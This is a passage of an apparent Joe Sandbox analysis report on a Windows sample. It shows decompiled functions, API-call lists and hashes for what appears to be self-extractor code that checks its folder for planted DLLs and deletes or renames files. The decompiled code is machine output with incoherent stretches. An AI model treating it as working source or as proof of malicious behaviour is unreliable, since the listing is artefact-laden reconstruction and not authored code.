				_Unknown_base(*)()* _t173;
				signed char _t180;
				intOrPtr _t194;
				long _t196;
				void* _t197;
				_Unknown_base(*)()* _t198;
				struct HINSTANCE__* _t200;
				signed int _t202;
				signed int _t204;
				void* _t205;
				_Unknown_base(*)()* _t206;
				signed int _t207;
				int _t208;
				void* _t210;

				E00A1E630();
				_push(_t207);
				_t180 = 0;
				_t200 = GetModuleHandleW(L"kernel32");
				if(_t200 == 0) {
					L5:
					_t115 =  *0xa3e080; // 0xa33b54
					_t208 = _t207 | 0xffffffff;
					_a4 = L"version.dll";
					_t201 = 0x800;
					_a8 = L"DXGIDebug.dll";
					_a12 = L"sfc_os.dll";
					_a16 = L"SSPICLI.DLL";
					_a20 = L"rsaenh.dll";
					_a24 = L"UXTheme.dll";
					_a28 = L"dwmapi.dll";
					_a32 = L"cryptbase.dll";
					_a36 = L"lpk.dll";
					_a40 = L"usp10.dll";
					_a44 = L"clbcatq.dll";
					_a48 = L"comres.dll";
					_a52 = L"ws2_32.dll";
					_a56 = L"ws2help.dll";
					_a60 = L"psapi.dll";
					_a64 = L"ieframe.dll";
					_a68 = L"ntshrui.dll";
					_a72 = L"atl.dll";
					_a76 = L"setupapi.dll";
					_a80 = L"apphelp.dll";
					_a84 = L"userenv.dll";
					_a88 = L"netapi32.dll";
					_a92 = L"shdocvw.dll";
					_a96 = L"crypt32.dll";
					_a100 = L"msasn1.dll";
					_a104 = L"cryptui.dll";
					_a108 = L"wintrust.dll";
					_a112 = L"shell32.dll";
					_a116 = L"secur32.dll";
					_a120 = L"cabinet.dll";
					_a124 = L"oleaccrc.dll";
					_a128 = L"ntmarta.dll";
					_a132 = L"profapi.dll";
					_a136 = L"WindowsCodecs.dll";
					_a140 = L"srvcli.dll";
					_a144 = L"cscapi.dll";
					_a148 = L"slc.dll";
					_a152 = L"imageres.dll";
					_a156 = L"dnsapi.DLL";
					_a160 = L"iphlpapi.DLL";
					_a164 = L"WINNSI.DLL";
					_a168 = L"netutils.dll";
					_a172 = L"mpr.dll";
					_a176 = L"devrtl.dll";
					_a180 = L"propsys.dll";
					_a184 = L"mlang.dll";
					_a188 = L"samcli.dll";
					_a192 = L"samlib.dll";
					_a196 = L"wkscli.dll";
					_a200 = L"dfscli.dll";
					_a204 = L"browcli.dll";
					_a208 = L"rasadhlp.dll";
					_a212 = L"dhcpcsvc6.dll";
					_a216 = L"dhcpcsvc.dll";
					_a220 = L"XmlLite.dll";
					_a224 = L"linkinfo.dll";
					_a228 = L"cryptsp.dll";
					_a232 = L"RpcRtRemote.dll";
					_a236 = L"aclui.dll";
					_a240 = L"dsrole.dll";
					_a244 = L"peerdist.dll";
					if( *_t115 == 0x78) {
						L14:
						GetModuleFileNameW(0,  &_a768, _t201);
						E00A10131( &_a9156, E00A0BE89(_t223,  &_a768), _t201);
						_t194 = 0;
						_t202 = 0;
						do {
							if(E00A0AEE5() < 0x600) {
								_t123 = 0;
								__eflags = 0;
							} else {
								_t123 = E00A10360( *((intOrPtr*)(_t210 + 0x14 + _t202 * 4))); // executed
							}
							if(_t123 == 0) {
								L20:
								_push(0x800);
								E00A0BEFF(_t227,  &_a768,  *((intOrPtr*)(_t210 + 0x18 + _t202 * 4)));
								_t127 = GetFileAttributesW( &_a756); // executed
								if(_t127 != _t208) {
									_t194 =  *((intOrPtr*)(_t210 + 0x14 + _t202 * 4));
									L24:
									if(_t180 != 0) {
										L30:
										_t234 = _t194;
										if(_t194 == 0) {
											return _t127;
										}
										E00A0BED3(_t234,  &_a764);
										if(E00A0AEE5() < 0x600) {
											_push( &_a9156);
											_push( &_a764);
											E00A03F8F( &_a4860, 0x864, L"Please remove %s from %s folder. It is unsecure to run %s until it is done.", _t194);
											_t210 = _t210 + 0x18;
											_t127 = AllocConsole();
											__eflags = _t127;
											if(_t127 != 0) {
												__imp__AttachConsole(GetCurrentProcessId());
												_t138 = E00A23883( &_a4856);
												WriteConsoleW(GetStdHandle(0xfffffff4),  &_a4856, _t138,  &_v8, 0);
												Sleep(0x2710);
												_t127 = FreeConsole();
											}
										} else {
											E00A10360(L"dwmapi.dll");
											E00A10360(L"uxtheme.dll");
											_push( &_a9148);
											_push( &_a756);
											E00A03F8F( &_a4848, 0x864, E00A0E0AC(_t182, 0xf1), _t194);
											_t210 = _t210 + 0x18;
											_t127 = E00A1A195(0,  &_a4844, E00A0E0AC(_t182, 0xf0), 0x30);
										}
										ExitProcess(0);
									}
									_t204 = 0;
									while(1) {
										_push(0x800);
										E00A0BEFF(0,  &_a764,  *((intOrPtr*)(_t210 + 0x38 + _t204 * 4)));
										_t127 = GetFileAttributesW( &_a752);
										if(_t127 != _t208) {
											break;
										}
										_t204 = _t204 + 1;
										if(_t204 < 0x35) {
											continue;
										}
										goto L30;
									}
									_t194 =  *((intOrPtr*)(_t210 + 0x34 + _t204 * 4));
									goto L30;
								}
							} else {
								_t127 = CompareStringW(0x400, 0x1001,  *(_t210 + 0x20 + _t202 * 4), _t208, L"DXGIDebug.dll", _t208); // executed
								_t227 = _t127 - 2;
								if(_t127 != 2) {
									goto L21;
								}
								goto L20;
							}
							L21:
							_t202 = _t202 + 1;
						} while (_t202 < 8);
						goto L24;
					}
					_t196 = E00A273CD(_t182, _t115);
					_pop(_t182);
					if(_t196 == 0) {
						goto L14;
					}
					GetModuleFileNameW(0,  &_a4864, 0x800);
					_t205 = CreateFileW( &_a4864, 0x80000000, 1, 0, 3, 0, 0);
					if(_t205 == _t208 || SetFilePointer(_t205, _t196, 0, 0) != _t196) {
						L13:
						CloseHandle(_t205);
						_t201 = 0x800;
						goto L14;
					} else {
						_t164 = ReadFile(_t205,  &_a13256, 0x7ffe,  &_v0, 0);
						_t222 = _t164;
						if(_t164 == 0) {
							goto L13;
						}
						_t182 = 0;
						_push(0x104);
						 *((short*)(_t210 + 0x33dc + (_v0 >> 1) * 2)) = 0;
						_push( &_a248);
						_push( &_a13256);
						while(1) {
							_t197 = E00A0FEB3(_t222);
							_t223 = _t197;
							if(_t197 == 0) {
								goto L13;
							}
							E00A10360( &_a248);
							_push(0x104);
							_push( &_a244);
							_push(_t197);
						}
						goto L13;
					}
				}
				_t173 = GetProcAddress(_t200, "SetDllDirectoryW");
				_t180 = _a46028;
				_t198 = _t173;
				if(_t198 != 0) {
					asm("sbb ecx, ecx");
					_t182 = _t198;
					 *0xa33260( ~(_t180 & 0x000000ff) & 0x00a335b4);
					 *_t198();
				}
				_t206 = GetProcAddress(_t200, "SetDefaultDllDirectories");
				if(_t206 != 0) {
					_t182 = _t206;
					 *0xa33260(((0 | _t180 == 0x00000000) - 0x00000001 & 0xfffff800) + 0x1000);
					 *_t206();
					_t180 = 1;
				}
				goto L5;
			}
























                                                        0x00a103af
                                                        0x00a103b5
                                                        0x00a103bd
                                                        0x00a103c5
                                                        0x00a103c9
                                                        0x00a1042f
                                                        0x00a1042f
                                                        0x00a10434
                                                        0x00a10437
                                                        0x00a1043f
                                                        0x00a10444
                                                        0x00a1044c
                                                        0x00a10457
                                                        0x00a1045f
                                                        0x00a10467
                                                        0x00a1046f
                                                        0x00a10477
                                                        0x00a1047f
                                                        0x00a10487
                                                        0x00a1048f
                                                        0x00a10497
                                                        0x00a1049f
                                                        0x00a104a7
                                                        0x00a104af
                                                        0x00a104b7
                                                        0x00a104bf
                                                        0x00a104c7
                                                        0x00a104cf
                                                        0x00a104d7
                                                        0x00a104df
                                                        0x00a104e7
                                                        0x00a104ef
                                                        0x00a104f7
                                                        0x00a104ff
                                                        0x00a10507
                                                        0x00a1050f
                                                        0x00a10517
                                                        0x00a10522
                                                        0x00a1052d
                                                        0x00a10538
                                                        0x00a10543
                                                        0x00a1054e
                                                        0x00a10559
                                                        0x00a10564
                                                        0x00a1056f
                                                        0x00a1057a
                                                        0x00a10585
                                                        0x00a10590
                                                        0x00a1059b
                                                        0x00a105a6
                                                        0x00a105b1
                                                        0x00a105bc
                                                        0x00a105c7
                                                        0x00a105d2
                                                        0x00a105dd
                                                        0x00a105e8
                                                        0x00a105f3
                                                        0x00a105fe
                                                        0x00a10609
                                                        0x00a10614
                                                        0x00a1061f
                                                        0x00a1062a
                                                        0x00a10635
                                                        0x00a10640
                                                        0x00a1064b
                                                        0x00a10656
                                                        0x00a10661
                                                        0x00a1066c
                                                        0x00a10677
                                                        0x00a10682
                                                        0x00a1068d
                                                        0x00a1075f
                                                        0x00a1076a
                                                        0x00a10787
                                                        0x00a1078c
                                                        0x00a1078e
                                                        0x00a10790
                                                        0x00a1079a
                                                        0x00a107a7
                                                        0x00a107a7
                                                        0x00a1079c
                                                        0x00a107a0
                                                        0x00a107a0
                                                        0x00a107ab
                                                        0x00a107cd
                                                        0x00a107cd
                                                        0x00a107de
                                                        0x00a107eb
                                                        0x00a107f3
                                                        0x00a107fd
                                                        0x00a10801
                                                        0x00a10803
                                                        0x00a1083b
                                                        0x00a1083b
                                                        0x00a1083d
                                                        0x00a10954
                                                        0x00a10954
                                                        0x00a1084b
                                                        0x00a1085a
                                                        0x00a108c9
                                                        0x00a108d1
                                                        0x00a108e5
                                                        0x00a108ea
                                                        0x00a108ed
                                                        0x00a108f3
                                                        0x00a108f5
                                                        0x00a108fe
                                                        0x00a10913
                                                        0x00a1092b
                                                        0x00a10936
                                                        0x00a1093c
                                                        0x00a1093c
                                                        0x00a1085c
                                                        0x00a10861
                                                        0x00a1086b
                                                        0x00a10877
                                                        0x00a1087f
                                                        0x00a10899
                                                        0x00a1089e
                                                        0x00a108b8
                                                        0x00a108b8
                                                        0x00a10944
                                                        0x00a10944
                                                        0x00a10805
                                                        0x00a10807
                                                        0x00a10807
                                                        0x00a10818
                                                        0x00a10825
                                                        0x00a1082d
                                                        0x00000000
                                                        0x00000000
                                                        0x00a1082f
                                                        0x00a10833
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a10835
                                                        0x00a10837
                                                        0x00000000
                                                        0x00a10837
                                                        0x00a107ad
                                                        0x00a107c2
                                                        0x00a107c8
                                                        0x00a107cb
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a107cb
                                                        0x00a107f5
                                                        0x00a107f5
                                                        0x00a107f6
                                                        0x00000000
                                                        0x00a107fb
                                                        0x00a10699
                                                        0x00a1069b
                                                        0x00a1069e
                                                        0x00000000
                                                        0x00000000
                                                        0x00a106af
                                                        0x00a106d1
                                                        0x00a106d5
                                                        0x00a10753
                                                        0x00a10754
                                                        0x00a1075a
                                                        0x00000000
                                                        0x00a106e7
                                                        0x00a106fc
                                                        0x00a10702
                                                        0x00a10704
                                                        0x00000000
                                                        0x00000000
                                                        0x00a1070c
                                                        0x00a1070e
                                                        0x00a10713
                                                        0x00a10722
                                                        0x00a1072a
                                                        0x00a10748
                                                        0x00a1074d
                                                        0x00a1074f
                                                        0x00a10751
                                                        0x00000000
                                                        0x00000000
                                                        0x00a10735
                                                        0x00a1073a
                                                        0x00a10746
                                                        0x00a10747
                                                        0x00a10747
                                                        0x00000000
                                                        0x00a10748
                                                        0x00a106d5
                                                        0x00a103d1
                                                        0x00a103d7
                                                        0x00a103de
                                                        0x00a103e2
                                                        0x00a103e9
                                                        0x00a103f2
                                                        0x00a103f4
                                                        0x00a103fa
                                                        0x00a103fa
                                                        0x00a10408
                                                        0x00a1040c
                                                        0x00a10423
                                                        0x00a10425
                                                        0x00a1042b
                                                        0x00a1042d
                                                        0x00a1042d
                                                        0x00000000

                                                        APIs
                                                        • GetModuleHandleW.KERNEL32(kernel32), ref: 00A103BF
                                                        • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00A103D1
                                                        • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00A10402
                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00A106AF
                                                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00A106CB
                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00A106DD
                                                        • ReadFile.KERNEL32(00000000,?,00007FFE,00A33BA4,00000000), ref: 00A106FC
                                                        • CloseHandle.KERNEL32(00000000), ref: 00A10754
                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00A1076A
                                                        • CompareStringW.KERNELBASE(00000400,00001001,?,?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 00A107C2
                                                        • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00000000,?,00000800), ref: 00A107EB
                                                        • GetFileAttributesW.KERNEL32(?,?,?,00000800), ref: 00A10825
                                                          • Part of subcall function 00A10360: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00A1037B
                                                          • Part of subcall function 00A10360: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00A0EE61,Crypt32.dll,00000000,00A0EEE5,?,?,00A0EEC7,?,?,?), ref: 00A1039D
                                                        • _swprintf.LIBCMT ref: 00A10899
                                                        • _swprintf.LIBCMT ref: 00A108E5
                                                          • Part of subcall function 00A03F8F: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00A03FA2
                                                        • AllocConsole.KERNEL32 ref: 00A108ED
                                                        • GetCurrentProcessId.KERNEL32 ref: 00A108F7
                                                        • AttachConsole.KERNEL32(00000000), ref: 00A108FE
                                                        • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00A10924
                                                        • WriteConsoleW.KERNEL32(00000000), ref: 00A1092B
                                                        • Sleep.KERNEL32(00002710), ref: 00A10936
                                                        • FreeConsole.KERNEL32 ref: 00A1093C
                                                        • ExitProcess.KERNEL32 ref: 00A10944
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l
                                                        • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                                                        • API String ID: 1201351596-3298887752
                                                        • Opcode ID: bec27d2150578aff961275918e76dd3713ec3d25cd9f4166916ff87b958b3917
                                                        • Instruction ID: e92ad9e5dbf92fc2c85260af307d8a69a3251e31be99c628a365c60d726d99a1
                                                        • Opcode Fuzzy Hash: bec27d2150578aff961275918e76dd3713ec3d25cd9f4166916ff87b958b3917
                                                        • Instruction Fuzzy Hash: 16D18FB250C384ABDB34DF50DD49FDFBBE8BB85704F50091CF6899A190C7B496898B62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A1C085 Relevance: 31.9, APIs: 14, Strings: 4, Instructions: 429windowCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 406 a1c085-a1c09d call a1e554 call a1e630 411 a1c0a3-a1c0cd call a1acc6 406->411 412 a1cd54-a1cd61 406->412 411->412 415 a1c0d3-a1c0d8 411->415 416 a1c0d9-a1c0e7 415->416 417 a1c0e8-a1c0fd call a1a957 416->417 420 a1c0ff 417->420 421 a1c101-a1c116 call a11ac4 420->421 424 a1c123-a1c126 421->424 425 a1c118-a1c11c 421->425 427 a1cd20-a1cd4b call a1acc6 424->427 428 a1c12c 424->428 425->421 426 a1c11e 425->426 426->427 427->416 439 a1cd51-a1cd53 427->439 430 a1c133-a1c136 428->430 431 a1c3c2-a1c3c4 428->431 432 a1c3a5-a1c3a7 428->432 433 a1c304-a1c306 428->433 430->427 438 a1c13c-a1c196 call a1a004 call a0bb55 call a0a690 call a0a7ca call a07119 430->438 431->427 436 a1c3ca-a1c3d1 431->436 432->427 435 a1c3ad-a1c3bd SetWindowTextW 432->435 433->427 437 a1c30c-a1c318 433->437 435->427 436->427 440 a1c3d7-a1c3f0 436->440 441 a1c31a-a1c32b call a27458 437->441 442 a1c32c-a1c331 437->442 495 a1c2d5-a1c2ea call a0a71d 438->495 439->412 446 a1c3f2 440->446 447 a1c3f8-a1c406 call a23883 440->447 441->442 444 a1c333-a1c339 442->444 445 a1c33b-a1c346 call a1ae2a 442->445 450 a1c34b-a1c34d 444->450 445->450 446->447 447->427 463 a1c40c-a1c415 447->463 457 a1c358-a1c378 call a23883 call a238ae 450->457 458 a1c34f-a1c356 call a23883 450->458 483 a1c391-a1c393 457->483 484 a1c37a-a1c381 457->484 458->457 464 a1c417-a1c41b 463->464 465 a1c43e-a1c441 463->465 464->465 469 a1c41d-a1c425 464->469 471 a1c447-a1c44a 465->471 472 a1c526-a1c534 call a10131 465->472 469->427 475 a1c42b-a1c439 call a10131 469->475 477 a1c457-a1c472 471->477 478 a1c44c-a1c451 471->478 485 a1c536-a1c54a call a21a6b 472->485 475->485 496 a1c474-a1c4ae 477->496 497 a1c4bc-a1c4c3 477->497 478->472 478->477 483->427 486 a1c399-a1c3a0 call a2389e 483->486 490 a1c383-a1c385 484->490 491 a1c388-a1c390 call a27458 484->491 505 a1c557-a1c5a8 call a10131 call a1ab60 GetDlgItem SetWindowTextW SendMessageW call a238b9 485->505 506 a1c54c-a1c550 485->506 486->427 490->491 491->483 512 a1c2f0-a1c2ff call a0a6a6 495->512 513 a1c19b-a1c1af SetFileAttributesW 495->513 523 a1c4b0 496->523 524 a1c4b2-a1c4b4 496->524 499 a1c4f1-a1c514 call a23883 * 2 497->499 500 a1c4c5-a1c4dd call a23883 497->500 499->485 534 a1c516-a1c524 call a10109 499->534 500->499 516 a1c4df-a1c4ec call a10109 500->516 541 a1c5ad-a1c5b1 505->541 506->505 511 a1c552-a1c554 506->511 511->505 512->427 518 a1c255-a1c265 GetFileAttributesW 513->518 519 a1c1b5-a1c1e8 call a0b6e7 call a0b3f7 call a23883 513->519 516->499 518->495 529 a1c267-a1c276 DeleteFileW 518->529 550 a1c1fb-a1c209 call a0bb15 519->550 551 a1c1ea-a1c1f9 call a23883 519->551 523->524 524->497 529->495 533 a1c278-a1c27b 529->533 537 a1c27f-a1c2ab call a03f8f GetFileAttributesW 533->537 534->485 546 a1c27d-a1c27e 537->546 547 a1c2ad-a1c2c3 MoveFileW 537->547 541->427 545 a1c5b7-a1c5cb SendMessageW 541->545 545->427 546->537 547->495 549 a1c2c5-a1c2cf MoveFileExW 547->549 549->495 550->512 556 a1c20f-a1c24e call a23883 call a1f5f0 550->556 551->550 551->556 556->518
                                                        C-Code - Quality: 49%
                                                        			E00A1C085() {
				intOrPtr _t228;
				void* _t233;
				intOrPtr _t289;
				signed int _t304;
				void* _t308;
				signed int _t309;
				void* _t313;

				E00A1E554(E00A32323, _t313);
				_t228 = 0x1bd4c;
				E00A1E630();
				if( *((intOrPtr*)(_t313 + 0xc)) == 0) {
					L179:
					 *[fs:0x0] =  *((intOrPtr*)(_t313 - 0xc));
					return _t228;
				}
				_push(0x1000);
				_push(_t313 - 0x15);
				_push(_t313 - 0xd);
				_push(_t313 - 0x3508);
				_push(_t313 - 0xfd58);
				_push( *((intOrPtr*)(_t313 + 0xc)));
				_t228 = E00A1ACC6();
				 *((intOrPtr*)(_t313 + 0xc)) = 0x1bd4c;
				if(0x1bd4c != 0) {
					_t289 =  *((intOrPtr*)(_t313 + 0x10));
					do {
						_t233 = _t313 - 0x3508;
						_t308 = _t313 - 0x1bd58;
						_t304 = 6;
						goto L4;
						L6:
						while(E00A11AC4(_t313 - 0xfd58,  *((intOrPtr*)(0xa3e618 + _t309 * 4))) != 0) {
							_t309 = _t309 + 1;
							if(_t309 < 0xe) {
								continue;
							} else {
								goto L177;
							}
						}
						if(_t309 > 0xd) {
							goto L177;
						}
						switch( *((intOrPtr*)(_t309 * 4 +  &M00A1CD65))) {
							case 0:
								__eflags = _t289 - 2;
								if(__eflags == 0) {
									E00A1A004(_t313 - 0x7d50, 0x800);
									E00A0A690(E00A0BB55(__eflags, _t313 - 0x7d50, _t313 - 0x3508, _t313 - 0xdd58, 0x800), _t289, _t313 - 0x8d58, _t309);
									 *(_t313 - 4) = 0;
									E00A0A7CA(_t313 - 0x8d58, _t313 - 0xdd58);
									E00A07119(_t313 - 0x5d50);
									while(1) {
										_push(0);
										_t297 = _t313 - 0x8d58;
										_t251 = E00A0A71D(_t313 - 0x8d58, _t302, _t313 - 0x5d50);
										__eflags = _t251;
										if(_t251 == 0) {
											break;
										}
										SetFileAttributesW(_t313 - 0x5d50, 0);
										__eflags =  *(_t313 - 0x4d44);
										if(__eflags == 0) {
											L18:
											_t255 = GetFileAttributesW(_t313 - 0x5d50);
											__eflags = _t255 - 0xffffffff;
											if(_t255 == 0xffffffff) {
												continue;
											}
											_t257 = DeleteFileW(_t313 - 0x5d50);
											__eflags = _t257;
											if(_t257 != 0) {
												continue;
											} else {
												_t311 = 0;
												_push(0);
												goto L22;
												L22:
												E00A03F8F(_t313 - 0x1108, 0x800, L"%s.%d.tmp", _t313 - 0x5d50);
												_t315 = _t315 + 0x14;
												_t262 = GetFileAttributesW(_t313 - 0x1108);
												__eflags = _t262 - 0xffffffff;
												if(_t262 != 0xffffffff) {
													_t311 = _t311 + 1;
													__eflags = _t311;
													_push(_t311);
													goto L22;
												} else {
													_t265 = MoveFileW(_t313 - 0x5d50, _t313 - 0x1108);
													__eflags = _t265;
													if(_t265 != 0) {
														MoveFileExW(_t313 - 0x1108, 0, 4);
													}
													continue;
												}
											}
										}
										E00A0B6E7(_t297, __eflags, _t313 - 0x7d50, _t313 - 0x1108, 0x800);
										E00A0B3F7(__eflags, _t313 - 0x1108, 0x800);
										_t312 = E00A23883(_t313 - 0x7d50);
										__eflags = _t312 - 4;
										if(_t312 < 4) {
											L16:
											_t276 = E00A0BB15(_t313 - 0x3508);
											__eflags = _t276;
											if(_t276 != 0) {
												break;
											}
											L17:
											_t279 = E00A23883(_t313 - 0x5d50);
											__eflags = 0;
											 *((short*)(_t313 + _t279 * 2 - 0x5d4e)) = 0;
											E00A1F5F0(0x800, _t313 - 0x40, 0, 0x1e);
											_t315 = _t315 + 0x10;
											 *((intOrPtr*)(_t313 - 0x3c)) = 3;
											_push(0x14);
											_pop(_t282);
											 *((short*)(_t313 - 0x30)) = _t282;
											 *((intOrPtr*)(_t313 - 0x38)) = _t313 - 0x5d50;
											_push(_t313 - 0x40);
											 *0xa62074();
											goto L18;
										}
										_t287 = E00A23883(_t313 - 0x1108);
										__eflags = _t312 - _t287;
										if(_t312 > _t287) {
											goto L17;
										}
										goto L16;
									}
									 *(_t313 - 4) =  *(_t313 - 4) | 0xffffffff;
									E00A0A6A6(_t313 - 0x8d58);
								}
								goto L177;
							case 1:
								__eflags = __ebx;
								if(__ebx == 0) {
									__eax =  *0xa5dc84;
									__eflags =  *0xa5dc84;
									__ebx = __ebx & 0xffffff00 |  *0xa5dc84 == 0x00000000;
									__eflags = __bl;
									if(__bl == 0) {
										__eax =  *0xa5dc84;
										_pop(__ecx);
										_pop(__ecx);
									}
									__bh =  *((intOrPtr*)(__ebp - 0xd));
									__eflags = __bh;
									if(__eflags == 0) {
										__eax = __ebp + 0xc;
										_push(__ebp + 0xc);
										__esi = E00A1AE2A(__ecx, __edx, __eflags);
										__eax =  *0xa5dc84;
									} else {
										__esi = __ebp - 0x3508;
									}
									__eflags = __bl;
									if(__bl == 0) {
										__edi = __eax;
									}
									__eax = E00A23883(__esi);
									__eax = __eax + __edi;
									_push(__eax);
									_push( *0xa5dc84);
									__eax = E00A238AE(__ecx, __edx);
									__esp = __esp + 0xc;
									__eflags = __eax;
									if(__eax != 0) {
										 *0xa5dc84 = __eax;
										__eflags = __bl;
										if(__bl != 0) {
											__ecx = 0;
											__eflags = 0;
											 *__eax = __cx;
										}
										__eax = E00A27458(__eax, __esi);
										_pop(__ecx);
										_pop(__ecx);
									}
									__eflags = __bh;
									if(__bh == 0) {
										__eax = L00A2389E(__esi);
									}
								}
								goto L177;
							case 2:
								__eflags = __ebx;
								if(__ebx == 0) {
									__ebp - 0x3508 = SetWindowTextW( *(__ebp + 8), __ebp - 0x3508);
								}
								goto L177;
							case 3:
								__eflags = __ebx;
								if(__ebx != 0) {
									goto L177;
								}
								__eflags =  *0xa4a472 - __di;
								if( *0xa4a472 != __di) {
									goto L177;
								}
								__eax = 0;
								__edi = __ebp - 0x3508;
								_push(0x22);
								 *(__ebp - 0x1108) = __ax;
								_pop(__eax);
								__eflags =  *(__ebp - 0x3508) - __ax;
								if( *(__ebp - 0x3508) == __ax) {
									__edi = __ebp - 0x3506;
								}
								__eax = E00A23883(__edi);
								__esi = 0x800;
								__eflags = __eax - 0x800;
								if(__eax >= 0x800) {
									goto L177;
								} else {
									__eax =  *__edi & 0x0000ffff;
									_push(0x5c);
									_pop(__ecx);
									__eflags = ( *__edi & 0x0000ffff) - 0x2e;
									if(( *__edi & 0x0000ffff) != 0x2e) {
										L52:
										__eflags = __ax - __cx;
										if(__ax == __cx) {
											L64:
											__ebp - 0x1108 = E00A10131(__ebp - 0x1108, __edi, __esi);
											__ebx = 0;
											__eflags = 0;
											L65:
											_push(0x22);
											_pop(__eax);
											__eax = __ebp - 0x1108;
											__eax = E00A21A6B(__ebp - 0x1108, __ebp - 0x1108);
											_pop(__ecx);
											_pop(__ecx);
											__eflags = __eax;
											if(__eax != 0) {
												__eflags =  *(__eax + 2) - __bx;
												if( *(__eax + 2) == __bx) {
													__ecx = 0;
													__eflags = 0;
													 *__eax = __cx;
												}
											}
											__eax = __ebp - 0x1108;
											__edi = 0xa4a472;
											E00A10131(0xa4a472, __ebp - 0x1108, __esi) = __ebp - 0x1108;
											__eax = E00A1AB60(__ebp - 0x1108, __esi);
											__esi = GetDlgItem( *(__ebp + 8), 0x66);
											__ebp - 0x1108 = SetWindowTextW(__esi, __ebp - 0x1108); // executed
											__eax = SendMessageW(__esi, 0x143, __ebx, 0xa4a472); // executed
											__eax = __ebp - 0x1108;
											__eax = E00A238B9(__ebp - 0x1108, 0xa4a472, __eax);
											_pop(__ecx);
											_pop(__ecx);
											__eflags = __eax;
											if(__eax != 0) {
												__ebp - 0x1108 = SendMessageW(__esi, 0x143, __ebx, __ebp - 0x1108);
											}
											goto L177;
										}
										__eflags = __ax;
										if(__ax == 0) {
											L55:
											__eax = __ebp - 0x1c;
											__ebx = 0;
											_push(__ebp - 0x1c);
											_push(1);
											_push(0);
											_push(L"Software\\Microsoft\\Windows\\CurrentVersion");
											_push(0x80000002);
											__eax =  *0xa62028();
											__eflags = __eax;
											if(__eax == 0) {
												__eax = __ebp - 0x14;
												 *(__ebp - 0x14) = 0x1000;
												_push(__ebp - 0x14);
												__eax = __ebp - 0x1108;
												_push(__ebp - 0x1108);
												__eax = __ebp - 0x20;
												_push(__ebp - 0x20);
												_push(0);
												_push(L"ProgramFilesDir");
												_push( *(__ebp - 0x1c));
												__eax =  *0xa62024();
												_push( *(__ebp - 0x1c));
												 *0xa62004() =  *(__ebp - 0x14);
												__ecx = 0x7ff;
												__eax =  *(__ebp - 0x14) >> 1;
												__eflags = __eax - 0x7ff;
												if(__eax >= 0x7ff) {
													__eax = 0x7ff;
												}
												__ecx = 0;
												__eflags = 0;
												 *(__ebp + __eax * 2 - 0x1108) = __cx;
											}
											__eflags =  *(__ebp - 0x1108) - __bx;
											if( *(__ebp - 0x1108) != __bx) {
												__eax = __ebp - 0x1108;
												__eax = E00A23883(__ebp - 0x1108);
												_push(0x5c);
												_pop(__ecx);
												__eflags =  *((intOrPtr*)(__ebp + __eax * 2 - 0x110a)) - __cx;
												if(__eflags != 0) {
													__ebp - 0x1108 = E00A10109(__eflags, __ebp - 0x1108, "\\", __esi);
												}
											}
											__esi = E00A23883(__edi);
											__eax = __ebp - 0x1108;
											__eflags = __esi - 0x7ff;
											__esi = 0x800;
											if(__eflags < 0) {
												__ebp - 0x1108 = E00A10109(__eflags, __ebp - 0x1108, __edi, 0x800);
											}
											goto L65;
										}
										__eflags =  *((short*)(__edi + 2)) - 0x3a;
										if( *((short*)(__edi + 2)) == 0x3a) {
											goto L64;
										}
										goto L55;
									}
									__eflags =  *((intOrPtr*)(__edi + 2)) - __cx;
									if( *((intOrPtr*)(__edi + 2)) != __cx) {
										goto L52;
									}
									__edi = __edi + 4;
									__ebx = 0;
									__eflags =  *__edi - __bx;
									if( *__edi == __bx) {
										goto L177;
									}
									__ebp - 0x1108 = E00A10131(__ebp - 0x1108, __edi, 0x800);
									goto L65;
								}
							case 4:
								__eflags =  *0xa4a46c - 1;
								__eflags = __eax - 0xa4a46c;
								 *__edi =  *__edi + __ecx;
								__eflags =  *(__ebx + 7) & __al;
								 *__eax =  *__eax + __al;
								__eflags =  *__eax;
							case 5:
								__eax =  *(__ebp - 0x3508) & 0x0000ffff;
								__ecx = 0;
								__eax =  *(__ebp - 0x3508) & 0x0000ffff;
								__eflags = __eax;
								if(__eax == 0) {
									L82:
									 *0xa48453 = __cl;
									 *0xa48460 = 1;
